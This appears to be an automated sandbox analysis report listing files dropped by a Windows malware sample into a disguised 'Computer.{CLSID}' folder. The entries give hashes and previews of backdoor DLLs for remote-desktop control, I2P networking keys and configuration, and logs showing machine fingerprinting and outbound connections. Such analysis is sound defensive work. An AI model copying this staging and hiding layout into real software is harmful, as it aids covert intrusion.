Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffdac0fb070)..[I] (tcp_connect) -> Done(sock=0x35c,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5869
Entropy (8bit):	5.4213113828756
Encrypted:	false
SSDEEP:	96:idHrNBJ9VTzBosmEmENyEyEkEY3mc7w7tQF3:ALNDTf2pEmENyEyEkEJ8x
MD5:	37C419FF32F13B7C7510C2BF785889AE
SHA1:	D75E8F852E716000D136FF015177E5EA3B0F029A
SHA-256:	E2AD9CC58BA0543A8DB2BC6A0A538273EAEF7CCFF839D4D4D504783D3618CD46
SHA-512:	28914181CE461975FBB3E9E6303739FB0B963237D6356DB96D07DCDC31F69419E90F13EC0B09A7C9B38D8143E8BFFAD7239AB205B00D976FECE1824EE536F2F7
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\64ckvqq3tal5y3hwajo4rzlhzrpvlrfb6abtlynmng22dfejpanq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.607386617690871
Encrypted:	false
SSDEEP:	6:BLPj3joSjziv2Fz+MKTClJ0CLVHTU9jDv8oQj1Uox+CBmewFfIOAVdwvLYvjcUaI:BLPlWe9ZKTClJ0Ch49jtfCmFYvjRn
MD5:	0E62A43977B6B9D1ADC79CA390F2869D
SHA1:	132246241B52725786DEBB0F8CE578133F48AC57
SHA-256:	D59858BA6A5C0560120E6B0C0A363A676CD92AD1BB2D0C848A09A312F28C706F
SHA-512:	2A3DC3B2238997FBB5D19CC51EF98110B70B6F5636F0E995763BF4A3D3C3703562E74726B175BA5CB5D493B720CB765BC2DD900144573D13357638572791B757
Malicious:	false
Preview:	.+tn.Hi..s&....'Q....@I...#m.!.+..\|<....0C..vl..5.1.....R`@.{..6.%D......."O......8..b1s5..Y......$d.I2...}..7Q.y%8....Wo.p.\|....e.....9hfb...oA.7.:~C..'..T....J..\|Ck^D.s.t.5.'...P?.T....9....z(.67..........UfO&.<.....@.F..-.R.Y.p~.A_.\?.fJ.Ku..V@P${.F.p.5..3p1.....,r.s.$.O.....&.z3.%\|..G%].M..0..5mR...r.p@....#>.[.KHN..aI&.#c'.. ...+:....+S......h?`.;yT.....$.M.....O.AOv.o:........5......O..}...E._.})2.>..a.s%..._...a..j......:..w...U.x.g....h.).agT.....s9..&sW/._...Xd.....v4...Y3.T..<

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\qsnl3ovq3znjrfbhmgylg4rq2hupgaxcmwexva5cf6sq7yafezmq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.6115831402029865
Encrypted:	false
SSDEEP:	12:G3U0Juh4Y6WLLyMWkylmqBQS0oA0DEg8aTgeBLPjCgwGdAhXB5m:G3Zg7LLyMWkylm/eN/8a9BLrR69B5m
MD5:	5AA848157444FC63C6A900B620D329DB
SHA1:	C1201DB7E3EC9685ABFEA182DCA94F2A20CE515F
SHA-256:	917DEC085CF8A3FA8068F8BBC97F3012101955C114089BE52F7C021F091CD823
SHA-512:	A5B9F7736E19056B1E873C58717796596536A3AF143D8633AA797F2327737AF39ED23DFC42801A20DA649D1187E507E06403623A3564A7EAEE1CF2ED2AC9B9E5
Malicious:	false
Preview:	r8E.......k..lh...zxw..\v..`.c.NA.^./.w...yv~......t\|k!z.D..K..}...d.7Y...C.%)......;.#H.t.....aO....~"./.....w.{.6..$!..k.....N...6...$.p.....(....="....z....>n.z.7.-.x..+.H.[zX. ".W\|.N.q.a:.N....q.[&K.5%../7...x.`dJ..8..K.N.bm.c..... js5Q.iD......H...&iD0.y......o...Q..l/....o..ZM$.\x..y..L..q.....r........E...J...c....`........BH.......q./.lV7\w.u.......f4_.2...J..7....d.KI.k'._.c?.Y+.....pR.A..(...J..gA.l..q......^...?D.KJ`.!........"....O9.y........U@..........-IB...}....<.a.R

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	6.121928094887358
Encrypted:	false
SSDEEP:	3:wgqibDJtFfiIa94Lo3rgUACN1Nv:T3KIayGrgsN1Nv
MD5:	B8D21CDE7E47C94F5426D1D85E81B517
SHA1:	1D4938CF8C455C3F52C1C46C223BDE84A4E51F1E
SHA-256:	1A1D599510760943250F6F2043A0EAC3A092BA17030DF727CC8553DEBF0F815D
SHA-512:	413CD67032C9F4449658FD469BD539ED7028F4A0A17CA75D28CE8C3B4188C20893C3DABAF2E912F952B5C30DCA7CCFC8293A0A757BA255A468ED7C398A663AA2
Malicious:	false
Preview:	.n.Y...fp...9.Q.7h~\:.. .V....>.@&..GQ..[..{.It{.u.MR...j...`.A..........V....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	721
Entropy (8bit):	6.701317594490171
Encrypted:	false
SSDEEP:	12:VwIcIzeIzeIzeIzeIzeIzeIzeIzeIzeIz7o53Idrr8JDrJkoRIFdrl/GF8+97FCS:VwcrrrrrrrrrIIdr6hRwdr+wFz9i
MD5:	DE6017E8BFBFE1FB3B07EA91C0B11D82
SHA1:	EFF40BF4898A2B0D41E77A1BB2B246F9A8AB6605
SHA-256:	DE8CA91AD067094A766A74AF2C1886894236003C2AD8CCF7B630C99543696915
SHA-512:	C8B841A069506E11E2CCFF40990A2D51309034EC041E0D808C11FDCB3088232F553E2FF651F47140D9204FC2270A10EFBDE19CA5BF0A9B7B6C9859B1D326F8E5
Malicious:	false
Preview:	...T.8v.tRE...P..n.?..e.R.*j..O.......z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C..k...>...>i.Y..i.L..6.."p&#..................Vu............NTCP2.@.caps=.4;.s=,2Z5uBVkef4lmcK2QwDn8Udk3aH5cOqEbILNWwwgECz4=;.v=.2;..........SSU2.q.caps=.4;.i=,YwVt319tFfDgVHdVl2r1L8qj-Vt-aSogzpTPv0bIFfs=;.s=,r3OMI0mrR1rqAYU4tPFgwFLDXxpjzxCGkEhbIOoeFm0=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;9"......h....5...............WJF.;'....\..&...Hky...\|.....G....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	455
Entropy (8bit):	6.112990685852996
Encrypted:	false
SSDEEP:	12:VwIcIzeIzeIzeIzeIzeIzeIzeIzeIzeIz7STgi3Hz1:VwcrrrrrrrrrfMT1
MD5:	7E37092D21BB39A4F780AA38CADFBF23
SHA1:	491C300C2A78300B46C83F4D239060B2CA688967
SHA-256:	A4CCD2CC9CC1E5B5BE1785BC2639810443C50D65D16C615860676756C2345F5C
SHA-512:	863F32050082216691694300F8565E3BB267455FCB799D8F9EB2F709C2E6252CA364D538E4571F3FAAA5809CBB747E639C4D3FCD7A4EB739582DF9862A89AA1D
Malicious:	false
Preview:	...T.8v.tRE...P..n.?..e.R.*j..O.......z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C..k...>...>i.Y..i.L..6.."p&#.................[;k.=)QoDW..Vk.......$L.=`U........F.....U.3-?Qr..].j4...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	6.144705599611885
Encrypted:	false
SSDEEP:	3:Cvi/cg4dZyJ0kvczyAo6gguPfvGPo9l1tr:Wbg4dZAYzyA/geP27tr
MD5:	FD8660BEA803245F99B862B76D472D21
SHA1:	3B4741A9A236CCF5FAA33F1A36F5CEAECD9A822E
SHA-256:	38D0B704F9BD8D8C1B45593DB0EAB3287958247B87B2479F007CE61F2F215B34
SHA-512:	0D667346A981253A92C8A8744291E14069DB743508C0F3794AD2D0DC2E419C93C25E9C6FDE54DE134C0DC1DD3BFDCFF6E01A35EC6FD88DD811C6F725A9C488F3
Malicious:	false
Preview:	.s.#I.GZ...8..`.R._.c....H[ ...m....L.zi.. S...qR..l..........=kc.m._m...TwU.j./..[~i* ..F...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.229509810228039
Encrypted:	false
SSDEEP:	1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
MD5:	4E320E2F46342D6D4657D2ADBF1F22D0
SHA1:	A5ACFE6397DFFC61D243206885C389EA05428755
SHA-256:	7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
SHA-512:	E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4672
Entropy (8bit):	5.351915267526841
Encrypted:	false
SSDEEP:	96:idHwWBJ9VTyHzHH0Hf0HaSHJmHu5SHSApmHSm5SH5mHOn5SHpSHzmHX5SHDmHH59:AzDTmTn0/06SAO5SHAz5SQc5SJSq35SA
MD5:	F62C4CA3E55DB716F9970D92EFD707BD
SHA1:	2257C05B8106F38B33AFC1C905C979A9E2DB6124
SHA-256:	EF5058C12B820220A7CE4121481A5E1AB195282BE971570C630236B9B11289F7
SHA-512:	8DA4A829DE8255B5A08DA393F8ACD518651AF5DB0C96366B8583B29739B7A25BB08799CC529B08B5A9BB75559372EC447AA118CD51947E18560F8C96FC6E1E4C
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1167
Entropy (8bit):	5.500983839309843
Encrypted:	false
SSDEEP:	24:CFAGHr5lGyclY7GfylD2BlD7cRE9FLxJsJ4b0ERYsXYnHeAOp:CFdHr54yclDEDsXcm9FL4gtueD
MD5:	B15F04655D3BC46F6B827E3B42DAD2BD
SHA1:	221F193C4B3DC896E1E346E258B1461CEE250C31
SHA-256:	06361820811F5B22968B035CF7E6BA7842CD4D75BD7B4CCE12346F9E87047A76
SHA-512:	39C64FBBF0564318A7D01BBB1F08E3C9D2D0209C084AF292866CD17323C642B4CD629F6744ACCDB265D4B9C5534D4DE20CDDF0CF518D6C0B7A024BE03B561897
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda55d9d36)..[I] (tcp_connect) -> Done(sock=0x394,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	5.503866268480334
Encrypted:	false
SSDEEP:	24:CFAGH75lGyclY7GfylD2BlD7cRE9FLxJsJ4b0dk1RDoYeXY7YcRAENmMeAOp:CFdH754yclDEDsXcm9FL4gqPcLMMeD
MD5:	53141CFA33B31F0CC85DA27FC7CC363D
SHA1:	5A94CB9DB3D8B2C75F940EA05998C0C2DA87D411
SHA-256:	984E72B7129E619810C646620D7CE929009F9AD6814041A5A939AC8BD3136E56
SHA-512:	B311896AAE144055E547211FA0AD86F95357CF20EC86A3BE531A120E57C656A4711BB34F03BA1C7629F2E3725A5BAAF86F5F288663EDA1B155536019A71349AF
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda55a

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
